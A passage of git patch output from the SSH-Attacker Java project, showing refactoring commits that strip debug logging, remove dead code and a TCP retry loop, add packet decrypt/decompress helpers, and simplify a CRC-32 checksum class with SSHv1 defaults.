b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStack.java @@ -124,7 +124,6 @@ public LayerStackProcessingResult sendData(List layerConfigu * data. */ public LayerStackProcessingResult receiveData(List layerConfigurationList) { - LOGGER.debug("Receiving Data"); if (getLayerList().size() != layerConfigurationList.size()) { throw new RuntimeException( "Illegal LayerConfiguration list provided. Each layer needs a configuration entry (null is fine too if no explicit configuration is desired). Expected " @@ -141,7 +140,6 @@ public LayerStackProcessingResult receiveData(List layerConf context.setTalkingConnectionEndType( context.getConnection().getLocalConnectionEndType().getPeer()); - LOGGER.debug("[bro] Recieving on Layer: " + getLayerList().get(0).getLayerType()); getLayerList().get(0).receiveData(); // reverse order for (int i = getLayerList().size() - 1; i >= 0; i--) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStackFactory.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStackFactory.java index 3660b811d..2c2dd513b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStackFactory.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStackFactory.java @@ -25,8 +25,6 @@ public final class LayerStackFactory { public static LayerStack createLayerStack(LayerConfiguration type, Context context) { - LOGGER.debug("Creating Layerstack for type: " + type); - LayerStack layerStack; SshContext sshContext = context.getSshContext(); TcpContext tcpContext = context.getTcpContext(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ProtocolLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ProtocolLayer.java index 9ec53f35f..aab27d2f9 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ProtocolLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ProtocolLayer.java @@ -36,9 +36,9 @@ public abstract class ProtocolLayer< private static final Logger LOGGER = LogManager.getLogger(); - private ProtocolLayer higherLayer = null; + private ProtocolLayer higherLayer = null; - private ProtocolLayer lowerLayer = null; + private ProtocolLayer lowerLayer = null; private LayerConfiguration layerConfiguration; @@ -162,16 +162,14 @@ protected boolean containerAlreadyUsedByHigherLayer(ContainerT container) { */ public HintedInputStream getDataStream() throws IOException { if (currentInputStream == null) { - LOGGER.debug("[bro] Current Inputstream is null"); receiveMoreDataForHint(null); if (currentInputStream == null) { throw new EndOfStreamException( "Could not receive data stream from lower layer, nothing more to receive"); } } - LOGGER.debug("Returned from 'more data', avilable = " + currentInputStream.available()); + /*LOGGER.debug("Returned from 'more data', avilable = " + currentInputStream.available());*/ if (currentInputStream.available() > 0) { - LOGGER.debug("[bro] Will Return now!"); return currentInputStream; } else { if (nextInputStream != null) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java index 9838a7dad..f51ec6c75 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java @@ -77,8 +77,6 @@ public PacketCipher getActiveDecryptCipher() { * line is terminated by LF). */ private Boolean receiveAsciiModeEnabled; - /** A layer to serialize messages */ - // private MessageLayer messageLayer = new MessageLayer(super.getContext()); /** * Sequence number used to generate MAC when sending packages. The sequence number is unsigned, diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java index ed141253a..0bdfa8b71 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java @@ -7,7 +7,6 @@ */ package de.rub.nds.sshattacker.core.layer.impl; -import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.CipherMode; import de.rub.nds.sshattacker.core.constants.CompressionAlgorithm; import de.rub.nds.sshattacker.core.constants.MessageIdConstant; @@ -79,7 +78,6 @@ public LayerProcessingResult sendConfiguration() throws IOException { } try { - // AbstractPacket packet = messageLayer.serialize(message); Preparator preparator = packet.getPreparator(context); preparator.prepare(); Serializer serializer = packet.getSerializer(context); @@ -90,7 +88,6 @@ public LayerProcessingResult sendConfiguration() throws IOException { } catch (IOException e) { LOGGER.warn("Error while sending packet: " + e.getMessage()); - // return new LayerProcessingResult(); } } } @@ -131,14 +128,12 @@ public LayerProcessingResult receiveData() { @Override public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException { - LOGGER.debug("[bro] receiveMoreDataForHint now in Transport"); LayerProcessingHint desiredHint = hint; InputStream dataStream = getLowerLayer().getDataStream(); - LOGGER.debug("Avialble Data: {}", dataStream.available()); + /*LOGGER.debug("Avialble Data: {}", dataStream.available());*/ AbstractPacketParser parser; AbstractPacket packet; - LOGGER.debug("[bro] Recieving a {}", context.getPacketLayer()); if (context.getPacketLayerType() == PacketLayerType.BINARY_PACKET) { parser = new BinaryPacketParser( @@ -153,18 +148,17 @@ public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException throw new RuntimeException(); } - LOGGER.debug("[bro] Parsing a {}", context.getPacketLayer()); parser.parse(packet); - LOGGER.debug( - "[bro] Recieved Packet: " + packet.getPayload() + " | " + packet.getCiphertext()); - + /*LOGGER.debug( + "[bro] Recieved Packet: " + packet.getPayload() + " | " + packet.getCiphertext()); + */ context.getPacketLayer().getDecryptor().decrypt(packet); context.getPacketLayer().getDecompressor().decompress(packet); - LOGGER.debug( - "[bro] Decompressed Payload: {}", - ArrayConverter.bytesToHexString(packet.getPayload())); + /*LOGGER.debug( + "[bro] Decompressed Payload: {}", + ArrayConverter.bytesToHexString(packet.getPayload()));*/ addProducedContainer(packet); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java index 60dfdf17b..4a1590a34 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java @@ -16,7 +16,6 @@ import de.rub.nds.sshattacker.core.layer.constant.ImplementedLayers; import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.layer.hints.LayerProcessingHint; -import de.rub.nds.sshattacker.core.layer.hints.PacketLayerHint; import de.rub.nds.sshattacker.core.layer.stream.HintedInputStream; import de.rub.nds.sshattacker.core.layer.stream.HintedInputStreamAdapterStream; import de.rub.nds.sshattacker.core.layer.stream.HintedLayerInputStream; @@ -54,21 +53,11 @@ public LayerProcessingResult sendConfiguration() throws IOException { LayerConfiguration configuration = getLayerConfiguration(); MessageIdConstant runningProtocolMessageType = null; ByteArrayOutputStream collectedMessageStream = new ByteArrayOutputStream(); - if (configuration != null) { - LOGGER.debug( - "[bro] Sending following configuration-size {} with layer_0 is {}", - configuration.getContainerList().size(), - configuration.getContainerList().get(0).toCompactString()); - } else { - LOGGER.debug("[bro] Configuration is null"); - } if (configuration != null && configuration.getContainerList() != null) { for (ProtocolMessage message : configuration.getContainerList()) { collectedMessageStream = new ByteArrayOutputStream(); - LOGGER.debug("[bro] here i am with sending the message"); - runningProtocolMessageType = message.getMessageIdConstant(); processMessage(message, collectedMessageStream); addProducedContainer(message); @@ -81,15 +70,6 @@ public LayerProcessingResult sendConfiguration() throws IOException { } } } - - if (runningProtocolMessageType == null) { - LOGGER.debug("[bro] Protocol Message Type is null!"); - } else { - LOGGER.debug("ProtocolMessageType: {}", runningProtocolMessageType.getId()); - } - - LOGGER.debug("[bro] " + "flushing {} to lower layer", collectedMessageStream.toByteArray()); - return getLayerResult(); } @@ -116,26 +96,21 @@ public LayerProcessingResult sendData(byte[] additionalData) throws IOException @Override public LayerProcessingResult receiveData() { - LOGGER.debug("[bro] SSH-Layer ist Recieving Data now"); - try { HintedInputStream dataStream; do { try { - LOGGER.debug("[bro] I´m here"); dataStream = getLowerLayer().getDataStream(); - LOGGER.debug("[bro] I was here"); } catch (IOException e) { // the lower layer does not give us any data so we can simply return here LOGGER.warn("The lower layer did not produce a data stream: ", e); return getLayerResult(); } - LOGGER.debug("[bro] Searching for Message"); LayerProcessingHint tempHint = dataStream.getHint(); byte[] streamContent; try { - LOGGER.debug("I could read {} bytes", dataStream.available()); + // LOGGER.debug("I could read {} bytes", dataStream.available()); streamContent = dataStream.readChunk(dataStream.available()); } catch (IOException e) { throw new RuntimeException(e); @@ -143,7 +118,6 @@ public LayerProcessingResult receiveData() { AbstractPacket packet; - LOGGER.debug("[bro] Recieving a {}", context.getPacketLayer()); if (context.getPacketLayerType() == PacketLayerType.BINARY_PACKET) { packet = new BinaryPacket(); } else if (context.getPacketLayerType() == PacketLayerType.BLOB) { @@ -194,7 +168,6 @@ public void parseMessageFromID(AbstractPacket packet, SshContext context) { MessageIdConstant id = MessageIdConstant.fromId(packet.getPayload().getValue()[0], context.getContext()); - LOGGER.debug("[bro] Identifier: {} and constant {}", packet.getPayload().getValue()[0], id); switch (MessageIdConstant.fromId(packet.getPayload().getValue()[0], context.getContext())) { case SSH_MSG_DISCONNECT: @@ -1212,14 +1185,9 @@ public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException try { HintedInputStream dataStream = null; dataStream = getLowerLayer().getDataStream(); - if (dataStream.getHint() == null) { - LOGGER.warn( - "The DTLS fragment layer requires a processing hint. E.g. a record type. Parsing as an unknown fragment"); - currentInputStream = new HintedLayerInputStream(null, this); - currentInputStream.extendStream(dataStream.readAllBytes()); - } else if (dataStream.getHint() instanceof PacketLayerHint) { - PacketLayerHint tempHint = (PacketLayerHint) dataStream.getHint(); - } + currentInputStream = new HintedLayerInputStream(null, this); + currentInputStream.extendStream(dataStream.readAllBytes()); + } catch (TimeoutException ex) { LOGGER.debug(ex); throw ex; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java index d7a1d361a..a741c7f07 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java @@ -86,15 +86,11 @@ public HintedInputStream getDataStream() throws IOException { null, new ByteArrayInputStream(receiveBuffer)); return currentInputStream; - // return receiveBuffer; } else { - // return context.getTransportHandler().fetchData(); int retries = 0; int maxRetries = 5; - LOGGER.debug( - "[bro] TCP-Layer is transmitting Datastream now with Timeout ", - getTransportHandler().getTimeout()); + InputStream handlerStream = getTransportHandler().getInputStream(); try { while (handlerStream.available() == 0 && retries < maxRetries) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/HintedLayerInputStream.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/HintedLayerInputStream.java index e499285fb..8e90b8558 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/HintedLayerInputStream.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/HintedLayerInputStream.java @@ -20,11 +20,11 @@ */ public class HintedLayerInputStream extends HintedInputStream { - private final ProtocolLayer layer; + private final ProtocolLayer layer; private ByteArrayInputStream stream = new ByteArrayInputStream(new byte[0]); - public HintedLayerInputStream(LayerProcessingHint hint, ProtocolLayer layer) { + public HintedLayerInputStream(LayerProcessingHint hint, ProtocolLayer layer) { super(hint); this.layer = layer; } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacket.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacket.java index cab736304..f796899b0 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacket.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacket.java @@ -187,7 +187,7 @@ public BinaryPacketSerializer getSerializer(SshContext context) { } @Override - public Handler getHandler(SshContext context) { + public Handler getHandler(SshContext context) { throw new UnsupportedOperationException("Not supported yet."); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BlobPacket.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BlobPacket.java index 1bec40d1a..d0b151776 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BlobPacket.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BlobPacket.java @@ -36,7 +36,7 @@ public BlobPacketSerializer getSerializer(SshContext context) { } @Override - public Handler getHandler(SshContext context) { + public Handler getHandler(SshContext context) { throw new UnsupportedOperationException("Not supported yet."); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowExecutor.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowExecutor.java index 8e0abd479..e2d5e18ab 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowExecutor.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowExecutor.java @@ -110,7 +110,7 @@ public void initTransportHandler(Context context) { } context.setTransportHandler( TransportHandlerFactory.createTransportHandler(context.getConnection())); - /*context.getTransportHandler() +/* context.getTransportHandler() .setResetClientSourcePort(config.isResetClientSourcePort()); if (context.getTransportHandler() instanceof ClientTcpTransportHandler) { ((ClientTcpTransportHandler) context.getTransportHandler()) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ForwardMessagesAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ForwardMessagesAction.java index e00f74022..676897f26 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ForwardMessagesAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ForwardMessagesAction.java @@ -53,9 +53,9 @@ public class ForwardMessagesAction extends SshAction implements ReceivingAction, @XmlTransient private byte[] receivedBytes; // equvialent to recived records - protected List receivedPackets; + protected List> receivedPackets; - protected List sendPackets; + protected List> sendPackets; public ForwardMessagesAction() { /* this.receiveMessageHelper = new ReceiveMessageHelper(); @@ -205,32 +205,8 @@ protected void forwardMessages(SshContext forwardToCtx) { LOGGER.debug(e); throw new RuntimeException(e); } - /* - try { - AbstractPacketLayer packetLayer = forwardToCtx.getPacketLayer(); - TransportHandler transportHandler = forwardToCtx.getTransportHandler(); - transportHandler.sendData(receivedBytes); - if (messages.get(0).getClass() != VersionExchangeMessage.class) { - forwardToCtx.incrementWriteSequenceNumber(); - } - setExecuted(true); - } catch (IOException e) { - LOGGER.debug(e); - executedAsPlanned = false; - setExecuted(false); - }*/ } - /* protected void handleReceivedMessages(SshContext ctx) { - receivedMessages = - receiveMessageHelper.handleReceivedBytes(ctx, receivedBytes).getMessageList(); - String expected = getReadableString(messages); - LOGGER.debug("Receive Expected (" + receiveFromAlias + "): " + expected); - String received = getReadableString(receivedMessages); - LOGGER.info("Received Messages (" + receiveFromAlias + "): " + received); - - executedAsPlanned = checkMessageListsEquals(messages, receivedMessages); - }*/ /** * Apply the contents of the messages to the given SSH context. * diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java index 70aa1e199..4b3713c63 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java @@ -173,41 +173,27 @@ public abstract class MessageAction extends ConnectionBoundAction { @XmlTransient private LayerStackProcessingResult layerStackProcessingResult; - // @XmlTransient protected final ReceiveMessageHelper receiveMessageHelper; - - // @XmlTransient protected final SendMessageHelper sendMessageHelper; - public MessageAction() { super(AliasedConnection.DEFAULT_CONNECTION_ALIAS); - /*receiveMessageHelper = new ReceiveMessageHelper(); - sendMessageHelper = new SendMessageHelper();*/ } public MessageAction(List> messages) { super(AliasedConnection.DEFAULT_CONNECTION_ALIAS); this.messages = new ArrayList<>(messages); - /*receiveMessageHelper = new ReceiveMessageHelper(); - sendMessageHelper = new SendMessageHelper();*/ } public MessageAction(ProtocolMessage... messages) { super(AliasedConnection.DEFAULT_CONNECTION_ALIAS); this.messages = Arrays.asList(messages); - /*receiveMessageHelper = new ReceiveMessageHelper(); - sendMessageHelper = new SendMessageHelper();*/ } public MessageAction(String connectionAlias) { super(connectionAlias); - /*receiveMessageHelper = new ReceiveMessageHelper(); - sendMessageHelper = new SendMessageHelper();*/ } public MessageAction(String connectionAlias, List> messages) { super(connectionAlias); this.messages = new ArrayList<>(messages); - /*receiveMessageHelper = new ReceiveMessageHelper(); - sendMessageHelper = new SendMessageHelper();*/ } public MessageAction(String connectionAlias, ProtocolMessage... messages) { @@ -382,11 +368,6 @@ private List getSpecificReceiveConfigurations( ((SpecificReceiveLayerConfiguration) recordConfiguration) .setAllowTrailingContainers(true); } - /* LayerConfiguration httpConfiguration = - new SpecificReceiveLayerConfiguration<>( - ImplementedLayers.HTTP, httpMessagesToReceive);*/ - applyActionOptionFilters(messageSsh1Configuration); - applyActionOptionFilters(messageSsh2Configuration); layerConfigurationList = sortLayerConfigurations( layerStack, @@ -397,23 +378,6 @@ private List getSpecificReceiveConfigurations( return layerConfigurationList; } - private void applyActionOptionFilters(LayerConfiguration messageConfiguration) { - List containerFilters = new LinkedList<>(); - /*if (getActionOptions().contains(ActionOption.IGNORE_UNEXPECTED_APP_DATA)) { - containerFilters.add(new GenericDataContainerFilter(ApplicationMessage.class)); - } - if (getActionOptions().contains(ActionOption.IGNORE_UNEXPECTED_KEY_UPDATE_MESSAGES)) { - containerFilters.add(new GenericDataContainerFilter(KeyUpdateMessage.class)); - } - if (getActionOptions().contains(ActionOption.IGNORE_UNEXPECTED_NEW_SESSION_TICKETS)) { - containerFilters.add(new GenericDataContainerFilter(NewSessionTicketMessage.class)); - } - if (getActionOptions().contains(ActionOption.IGNORE_UNEXPECTED_WARNINGS)) { - containerFilters.add(new WarningAlertFilter()); - }*/ - ((SpecificReceiveLayerConfiguration) messageConfiguration) - .setContainerFilterList(containerFilters); - } private void getReceiveResult( LayerStack layerStack, List layerConfigurationList) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/SendAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/SendAction.java index 8b19f16ec..6b9e4a063 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/SendAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/SendAction.java @@ -104,26 +104,9 @@ public void execute(State state) throws WorkflowExecutionException { send(context, messages, packets); setExecuted(true); } catch (IOException e) { - /*if (!getActionOptions().contains(ActionOption.MAY_FAIL)) { - tlsContext.setReceivedTransportHandlerException(true); - LOGGER.debug(e); - } - setExecuted(getActionOptions().contains(ActionOption.MAY_FAIL));*/ + LOGGER.warn(e); } - /*messages.forEach(message -> message.getHandler(context).getPreparator().prepare()); - final MessageActionResult result = - sendMessageHelper.sendMessages(context, messages.stream()); - - // Check if all actions that were expected to be send were actually - // sent or if some failure occurred. - final int failedMessageCount = messages.size() - result.getPacketList().size(); - this.setFailed(failedMessageCount != 0); - if (this.isFailed()) { - LOGGER.error( - "Failed to send {} out of {} message(s)!", failedMessageCount, messages.size()); - }*/ - setExecuted(true); } From ac4ef7e2fd88cf7298a12ef4ddeec4261986e183 Mon Sep 17 00:00:00 2001 From: Steffen Date: Fri, 8 Sep 2023 15:35:51 +0200 Subject: [PATCH 075/176] fixed "packetcomputation is no prepared" and researched timeout --- .../nds/sshattacker/core/config/Config.java | 1 - .../core/layer/impl/PacketLayer.java | 13 ++++++------ .../sshattacker/core/layer/impl/TcpLayer.java | 21 ------------------- .../layer/stream/HintedLayerInputStream.java | 4 ++-- .../core/workflow/WorkflowExecutor.java | 2 +- .../core/workflow/action/MessageAction.java | 2 -- 6 files changed, 9 insertions(+), 34 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java index f9517e512..b59c4fbb4 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java @@ -81,7 +81,6 @@ public void setDefaultAdditionalPadding(Integer defaultAdditionalPadding) { private Boolean resetClientSourcePort = true; - // region VersionExchange /** Client protocol and software version string starting with the SSH version (SSH-2.0-...) */ private String clientVersion; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java index 0bdfa8b71..e391344e9 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java @@ -130,7 +130,6 @@ public LayerProcessingResult receiveData() { public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException { LayerProcessingHint desiredHint = hint; InputStream dataStream = getLowerLayer().getDataStream(); - /*LOGGER.debug("Avialble Data: {}", dataStream.available());*/ AbstractPacketParser parser; AbstractPacket packet; @@ -149,12 +148,8 @@ public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException } parser.parse(packet); - - /*LOGGER.debug( - "[bro] Recieved Packet: " + packet.getPayload() + " | " + packet.getCiphertext()); - */ - context.getPacketLayer().getDecryptor().decrypt(packet); - context.getPacketLayer().getDecompressor().decompress(packet); + decryptPacket(packet); + decompressPacket(packet); /*LOGGER.debug( "[bro] Decompressed Payload: {}", @@ -231,4 +226,8 @@ protected void decryptPacket(AbstractPacket packet) { packet.prepareComputations(); getDecryptor().decrypt(packet); } + + protected void decompressPacket(AbstractPacket packet) { + getDecompressor().decompress(packet); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java index a741c7f07..16fc072ab 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java @@ -21,8 +21,6 @@ import de.rub.nds.tlsattacker.transport.tcp.TcpTransportHandler; import java.io.ByteArrayInputStream; import java.io.IOException; -import java.io.InputStream; -import java.util.concurrent.TimeUnit; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -88,25 +86,6 @@ public HintedInputStream getDataStream() throws IOException { } else { - int retries = 0; - int maxRetries = 5; - - InputStream handlerStream = getTransportHandler().getInputStream(); - try { - while (handlerStream.available() == 0 && retries < maxRetries) { - handlerStream = getTransportHandler().getInputStream(); - try { - TimeUnit.MILLISECONDS.sleep(10); - } catch (InterruptedException e) { - throw new RuntimeException(e); - } - retries++; - LOGGER.debug("got no stream in {}-trie", retries); - } - } catch (IOException e) { - throw new RuntimeException(e); - } - currentInputStream = new HintedInputStreamAdapterStream( null, getTransportHandler().getInputStream()); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/HintedLayerInputStream.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/HintedLayerInputStream.java index 8e90b8558..a4dfeaec5 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/HintedLayerInputStream.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/HintedLayerInputStream.java @@ -20,11 +20,11 @@ */ public class HintedLayerInputStream extends HintedInputStream { - private final ProtocolLayer layer; + private final ProtocolLayer layer; private ByteArrayInputStream stream = new ByteArrayInputStream(new byte[0]); - public HintedLayerInputStream(LayerProcessingHint hint, ProtocolLayer layer) { + public HintedLayerInputStream(LayerProcessingHint hint, ProtocolLayer layer) { super(hint); this.layer = layer; } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowExecutor.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowExecutor.java index e2d5e18ab..13b2d0b07 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowExecutor.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowExecutor.java @@ -110,7 +110,7 @@ public void initTransportHandler(Context context) { } context.setTransportHandler( TransportHandlerFactory.createTransportHandler(context.getConnection())); -/* context.getTransportHandler() + /* context.getTransportHandler() .setResetClientSourcePort(config.isResetClientSourcePort()); if (context.getTransportHandler() instanceof ClientTcpTransportHandler) { ((ClientTcpTransportHandler) context.getTransportHandler()) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java index 4b3713c63..8f0adddec 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java @@ -24,7 +24,6 @@ import java.io.IOException; import java.util.ArrayList; import java.util.Arrays; -import java.util.LinkedList; import java.util.List; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -378,7 +377,6 @@ private List getSpecificReceiveConfigurations( return layerConfigurationList; } - private void getReceiveResult( LayerStack layerStack, List layerConfigurationList) { LayerStackProcessingResult processingResult; From 80d81b58bb1e40da2b53a4f4c51fbd6a203c32db Mon Sep 17 00:00:00 2001 From: Steffen Date: Fri, 8 Sep 2023 16:29:20 +0200 Subject: [PATCH 076/176] simplifieng crc-checksum caluclation --- .../sshattacker/core/crypto/checksum/CRC.java | 48 ++++++++++++------- .../ClientSessionKeyMessageSerializer.java | 2 +- .../ServerPublicKeyMessageSerializer.java | 2 +- 3 files changed, 33 insertions(+), 19 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/checksum/CRC.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/checksum/CRC.java index 2b775cf14..c0ad5cbc8 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/checksum/CRC.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/checksum/CRC.java @@ -9,6 +9,20 @@ public class CRC { + // Defines, how long the checksum should be + private int width; + // Defines which polynomnial should be used to calculate the checksum + private long polynomial; + // Defines, if the input-value should be reflected or not + private boolean reflectIn; + + // Defines, if the output-value shut be reflected or not + private boolean reflectOut; + // Defines, which value should be used to init the alrogithm + private long init; + // Defines, if the last value should be xored or not + private long finalXor; + private long reverseBits(long n, int numBits) { long result = 0; for (int i = 0; i < numBits; i++) { @@ -17,23 +31,13 @@ private long reverseBits(long n, int numBits) { return result; } - private long mask; - - private int width; - private long polynomial; - private boolean reflectIn; - private boolean reflectOut; - private long init; - private long finalXor; - public long calculateCRC(byte[] data) { long curValue = this.init; long topBit = 1L << (this.width - 1); long mask = (topBit << 1) - 1; - int end = data.length; - for (int i = 0; i < end; i++) { - long curByte = ((long) (data[i])) & 0x00FFL; + for (byte b : data) { + long curByte = ((long) (b)) & 0x00FFL; if (this.reflectIn) { curByte = reverseBits(curByte, 8); } @@ -56,7 +60,7 @@ public long calculateCRC(byte[] data) { curValue = reverseBits(curValue, this.width); } - curValue = curValue ^ this.finalXor; + curValue ^= this.finalXor; return curValue & mask; } @@ -79,10 +83,20 @@ public CRC( if (this.reflectIn) { this.init = reverseBits(this.init, width); } - if (this.width >= 64) { - this.mask = 0; - } else { - this.mask = (1L << this.width) - 1; + } + + // Default-Values for SSHv1 + public CRC() { + + this.width = 32; + this.polynomial = 0x0104C11DB7L; + this.init = 0; + this.reflectIn = true; + this.reflectOut = true; + this.finalXor = 0; + + if (this.reflectIn) { + this.init = reverseBits(this.init, width); } } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ClientSessionKeyMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ClientSessionKeyMessageSerializer.java index d6ceb7153..405ee1cc8 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ClientSessionKeyMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ClientSessionKeyMessageSerializer.java @@ -58,7 +58,7 @@ private void serializeProtocolFlags() { } private void serializCRCChecksum() { - CRC crc32 = new CRC(32, 0x0104C11DB7L, 0, true, true, 0); + CRC crc32 = new CRC(); byte[] checksum = ArrayConverter.longToBytes(crc32.calculateCRC(getAlreadySerialized()), 4); appendBytes(checksum); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ServerPublicKeyMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ServerPublicKeyMessageSerializer.java index 9d25feb30..fbfafabee 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ServerPublicKeyMessageSerializer.java +++ 